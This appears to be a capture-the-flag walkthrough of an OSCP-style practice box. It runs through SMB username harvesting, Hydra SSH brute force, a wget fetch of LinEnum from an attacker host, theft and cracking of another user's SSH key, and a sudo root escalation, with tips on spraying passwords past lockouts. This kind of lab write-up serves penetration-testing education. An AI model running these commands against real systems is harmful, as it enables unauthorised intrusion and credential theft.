0x00 Introduction

Anonymous is a grindy Linux box that sharpens the muscle memory every OSCP hunter needs: enumerate, pivot, crack, escalate.

The path is straightforward but deliberate:

• SMB leaks usernames.

• Hydra turns one of them into SSH creds.

• Home directories reveal an SSH key.

• Cracking the key lands a second user.

• Sudo rules finish the job.

No gimmicks, no exotic exploits — just fundamentals stacked together. This is the kind of workflow that wins both in CTF labs and real-world pentests.

Sidebar: Why SMB Still Matters in 2025

It’s tempting to treat SMB as “old news,” but it’s still one of the most common misconfigured services on enterprise networks.

• Legacy creep: SMB shares persist because file servers rarely get cleaned up.

• User leaks: Even when files aren’t valuable, shares often spill usernames — the first step toward credential attacks.

• Cross-pivoting: SMB enumeration on one system often hands you accounts that work elsewhere.

In CTFs like Anonymous, SMB gives you just enough to move forward. In the wild, it’s often the exact breadcrumb that cracks open Active Directory.

0x01 Initial Enumeration

First step: full port scan.

nmap -sC -sV -T4 -p- 10.10.44.87

Results lit up:

22/tcp   open  ssh        OpenSSH 7.2p2
80/tcp   open  http       Apache 2.4.18
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy

Plenty to poke at, but SMB stood out as the fastest lead.

List shares:

smbmap -H 10.10.44.87

Output (trimmed):

Anonymous   READ ONLY
IPC$        NO ACCESS

Connect:

smbclient //10.10.44.87/Anonymous -N

Inside the share:

staff.txt

Grab and read:

get staff.txt
cat staff.txt

Usernames recovered:

jan
kay

That’s your first real foothold. Even without passwords, valid usernames give Hydra something to aim at.

Sidebar: Harvesting Users from SMB

Files aren’t always the win — the usernames are.

• Scan SMB shares for staff/user lists and naming conventions.

• Dead-end docs often contain initials, email handles, or password hints.

• “Boring” loot starts real chains.

0x02 Foothold — Brute Force to Shell

With jan and kay in hand, test SSH. Hydra does the heavy lifting:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.44.87

Hit confirmed:

[22][ssh] host: 10.10.44.87  login: jan  password: armando

Log in:

ssh jan@10.10.44.87

First blood:

cat ~/user.txt

Expand visibility. Stage LinEnum to map local privilege landscape:

wget http://<attacker-ip>:31337/LinEnum.sh -O /dev/shm/LinEnum.sh
chmod +x /dev/shm/LinEnum.sh
/dev/shm/LinEnum.sh

Sidebar: Brute Force vs. Password Spraying

• Brute force: One account, many guesses. Great in labs, noisy in prod.

• Password spraying: Few smart guesses, many accounts. Quieter, often better.

Why it works IRL:

• “Season+Year” patterns still show up (Spring2025!).

• Lockouts fire quickly; spraying dodges thresholds.

• Credential reuse is rampant across services.

0x03 Pivot — Looting Kay’s Keys

LinEnum didn’t show a clean privesc, but it did spotlight an .ssh directory in kay’s home.

Check it:

ls -la /home/kay/.ssh

Find a private key:

id_rsa

Serve it off the target:

cd /home/kay/.ssh
python3 -m http.server 5555

Pull it to attacker:

wget http://10.10.44.87:5555/id_rsa

Convert and crack the passphrase:

ssh2john id_rsa > id_rsa_for_john.txt
john id_rsa_for_john.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Output: b*****x

Use the key + passphrase:

chmod 600 id_rsa
ssh -i id_rsa kay@10.10.44.87

Second user secured.

Sidebar: SSH Key Hygiene — Why This Still Works

• Weak passphrases: If “password123” is bad for SSH, it’s bad as a key passphrase.

• Key sprawl: Old keys linger in home dirs and repos.

• Cracking is cheap: ssh2john + john tear through weak phrases.

Once a key cracks, you bypass account lockouts and throttling. It’s stealthier and more durable than guessing.

0x04 Privilege Escalation

As kay, a stray backup_password.txt looked interesting, but it wasn’t needed. The real win was in sudo:

sudo -l

Output (relevant line):

User kay may run the following commands on this host:
    (ALL : ALL) NOPASSWD: ALL

That’s game over — full root without a password.

Finish it:

sudo cat /root/flag.txt

Root flag captured.

Sidebar: Sudo Misconfigurations — The Silent Root

Seeing NOPASSWD: ALL means you’re effectively root already. How this happens:

• Blanket permissions during troubleshooting, never revoked.

• “Trusted user” shortcuts that turn into permanent backdoors.

• Sloppy config drift across hosts.

Takeaway: Always run sudo -l. It’s free and often decisive.

0x05 Debrief + Command Recap

Anonymous is the definition of an OSCP-style target: methodical enumeration, steady credential pivots, and a clean sudo escalation. Nothing flashy — and that’s the point. These are the habits that pay off against real networks.

Chain recap

• SMB → usernames.

• Hydra → jan SSH.

• LinEnum → .ssh find for kay.

• ssh2john/john → cracked passphrase.

• sudo -l → NOPASSWD: ALL → root.

Command recap

# Recon
nmap -sC -sV -T4 -p- 10.10.44.87

# SMB
smbmap -H 10.10.44.87
smbclient //10.10.44.87/Anonymous -N
get staff.txt && cat staff.txt

# Brute Force
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.44.87
ssh jan@10.10.44.87
cat ~/user.txt

# Local Enum
wget http://<attacker-ip>:31337/LinEnum.sh -O /dev/shm/LinEnum.sh
chmod +x /dev/shm/LinEnum.sh && /dev/shm/LinEnum.sh

# Key Looting & Cracking
cd /home/kay/.ssh && python3 -m http.server 5555
wget http://10.10.44.87:5555/id_rsa
ssh2john id_rsa > id_rsa_for_john.txt
john id_rsa_for_john.txt --wordlist=/usr/share/wordlists/rockyou.txt
chmod 600 id_rsa
ssh -i id_rsa kay@10.10.44.87

# Priv-Esc
sudo -l
sudo cat /root/flag.txt

Sidebar: Why “Boring Chains” Win

• Enumerate thoroughly. Don’t skip SMB because it looks dull.

• Try defaults first; they’re free.

• Check user homes (~/.ssh, configs, creds).

• Run sudo -l every single time.

In bug bounty and pentests, most wins come from this exact mindset — not bleeding-edge CVEs, but sloppy configs, reused creds, and forgotten shares. Grind boxes like Anonymous and you’re building the habits that convert.